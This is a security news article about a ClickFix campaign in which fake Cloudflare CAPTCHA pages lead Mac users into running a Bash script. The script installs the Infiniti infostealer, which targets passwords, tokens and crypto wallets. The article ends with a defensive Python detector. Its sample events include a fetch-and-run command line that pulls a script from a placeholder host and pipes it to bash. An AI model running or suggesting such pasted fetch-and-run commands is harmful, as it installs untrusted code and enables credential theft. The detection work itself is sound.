Infiniti Stealer Campaign Exploits Cloudflare Brand Trust
Security researchers discovered a sophisticated malware campaign targeting Mac users through fake Cloudflare-branded CAPTCHA verification pages on March 27, 2026. The attack leverages the ClickFix social engineering technique, exploiting users' familiarity with legitimate Cloudflare security checks to deliver the Infiniti infostealer malware.
The attack begins when victims visit compromised websites or click malicious links that redirect them to convincing fake CAPTCHA pages mimicking Cloudflare's security verification interface. These pages display familiar elements including Cloudflare's logo, color scheme, and messaging that users typically encounter when accessing websites protected by Cloudflare's security services.
The infection chain represents a multi-stage attack designed to bypass macOS security protections. Once users interact with the fake CAPTCHA, they're prompted to complete a verification process that actually triggers the download and execution of malicious code. The attackers have crafted the social engineering component to appear legitimate, capitalizing on users' trust in Cloudflare's widespread security infrastructure.
The campaign demonstrates increasing sophistication in targeting Mac users, who have historically been less targeted by malware campaigns compared to Windows users. The choice to impersonate Cloudflare specifically reflects the service's ubiquity across the internet, making the fake verification pages appear credible to a broad range of users.
Researchers identified the campaign through analysis of suspicious network traffic and user reports of unexpected system behavior following interactions with seemingly legitimate security verification pages. The attack represents a concerning evolution in social engineering tactics specifically designed to circumvent macOS security measures.
macOS Users Across All Versions Face Credential Theft Risk
The Infiniti stealer campaign affects Mac users running all current versions of macOS, including macOS Sonoma 14.x, macOS Ventura 13.x, and macOS Monterey 12.x. The malware doesn't exploit specific system vulnerabilities but instead relies on social engineering to trick users into manually executing malicious code, making version-specific protections less effective.
Users most at risk include those who frequently encounter CAPTCHA verification pages during normal web browsing, particularly individuals who access websites protected by content delivery networks or security services. Because the attack trades on familiarity with legitimate Cloudflare verification prompts, it is most effective against users who regularly interact with websites using Cloudflare's services and have learned to complete such checks without a second thought.
The infostealer focuses on harvesting sensitive data stored on infected systems, including saved passwords from browsers, cryptocurrency wallet information, authentication tokens, and personal files. Mac users who store financial information, use password managers integrated with browsers, or maintain cryptocurrency wallets face the highest risk of significant data loss.
Organizations with Mac-based workforces should be particularly concerned, as the stealer can potentially access corporate credentials, VPN configurations, and sensitive business documents stored on infected systems. Remote workers and employees who frequently access cloud services through web browsers represent prime targets for this type of credential harvesting attack.
Four-Stage Infection Chain Bypasses macOS Security Controls
The Infiniti stealer employs a sophisticated four-stage infection chain designed to evade detection and establish persistence on macOS systems. The attack begins with the fake CAPTCHA page, which serves as the initial social engineering vector. When users attempt to complete the verification, they unknowingly trigger the download of a Bash script that initiates the infection process.
The second stage involves the execution of the Bash script, which performs initial system reconnaissance and downloads additional components. This script checks for security software, establishes network connectivity to command-and-control servers, and prepares the system for payload delivery. The script operates with the permissions of the user who triggered the fake CAPTCHA, avoiding the need for privilege escalation.
The third stage deploys a loader built with Nuitka, a Python-to-executable compiler, which packages the final payload in a format designed to bypass macOS security mechanisms. Nuitka compilation helps obfuscate the malicious Python code and makes static analysis more difficult for security tools. The loader establishes persistence mechanisms and creates the necessary directory structures for the stealer's operation.
The final stage activates the Python-based Infiniti stealer itself, which begins systematic data harvesting from the infected system. The stealer targets browser credential stores, examines running processes for cryptocurrency applications, and searches for files containing sensitive information.

Mac users who suspect infection should immediately disconnect from the internet and run comprehensive security scans using updated antimalware tools. Organizations should implement network monitoring to detect unusual outbound traffic patterns that might indicate data exfiltration attempts.
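The chain described above has a recognisable shape in endpoint telemetry: a shell spawned from a terminal app whose command line fetches remote content and executes it, followed by descendants that run from a user-writable directory and open outbound connections. The following detector is an added example written for this article, not code from the researchers or the campaign; the event schema, process paths and hostnames are constructed placeholders, and the allowlist of trusted installer hosts is an assumption that keeps a developer's pasted vendor install one-liner from being scored the same as the malicious chain.

```python
"""Flag the ClickFix chain described above in constructed process events (not real telemetry)."""
import re
from collections import defaultdict
# Stages 1-2: a terminal-spawned shell whose command line fetches remote content and runs it.
FETCH_AND_RUN = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"          # curl ... | bash
    r"|\b(ba|z)?sh\b.*-c\s+[\"']?\$\((curl|wget)\b"  # bash -c "$(curl ...)"
)
TERMINALS = {"Terminal", "iTerm2"}
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/")
TRUSTED_SCRIPT_HOSTS = {"installer.example.invalid"}  # constructed allowlist of vendor installers
def ev(pid, ppid, proc, parent, path, cmdline, dest=None):  # dest: remote host contacted, if any
    return dict(pid=pid, ppid=ppid, proc=proc, parent=parent, path=path, cmdline=cmdline, dest=dest)

def host_in(cmdline):
    m = re.search(r"https?://([^/\s\"')]+)", cmdline)
    return m.group(1).lower() if m else None

def detect_chain(events):
    """Return (severity, pid, reason) findings; the chain escalates from medium to high."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if (e["proc"] not in ("sh", "bash", "zsh") or e["parent"] not in TERMINALS
                or not FETCH_AND_RUN.search(e["cmdline"])):
            continue
        host = host_in(e["cmdline"])
        sev = "low" if host in TRUSTED_SCRIPT_HOSTS else "medium"
        findings.append((sev, e["pid"], f"terminal-pasted fetch-and-run from {host}"))
        # Stages 3-4: a descendant running from a user-writable path that also talks to the
        # network matches the dropped loader/stealer, so the whole chain is escalated.
        stack = list(children[e["pid"]])
        while stack:
            c = stack.pop()
            stack.extend(children[c["pid"]])
            if c["path"].startswith(USER_WRITABLE) and c["dest"]:
                findings.append(("high", c["pid"], f"{c['path']} -> {c['dest']} under pasted shell"))
    return findings
SAMPLE_EVENTS = [  # constructed; hostnames and paths are placeholders, not campaign indicators
    ev(101, 100, "bash", "Terminal", "/bin/bash",
       'bash -c "$(curl -fsSL http://captcha-verify.example.invalid/v.sh)"'),
    ev(103, 101, "ld", "bash", "/private/tmp/.cf/ld", "/private/tmp/.cf/ld", dest="c2.example.invalid"),
    ev(104, 103, "st", "ld", "/private/tmp/.cf/st", "/private/tmp/.cf/st", dest="c2.example.invalid"),
    # benign: a developer pasting a vendor's documented install one-liner from an allowlisted host
    ev(200, 100, "bash", "Terminal", "/bin/bash",
       'bash -c "$(curl -fsSL https://installer.example.invalid/install.sh)"'),
]
```

The pasted-command pattern alone is noisy on developer machines, which is why the escalation to high only fires when a descendant of that shell both runs from a user-writable location and contacts the network.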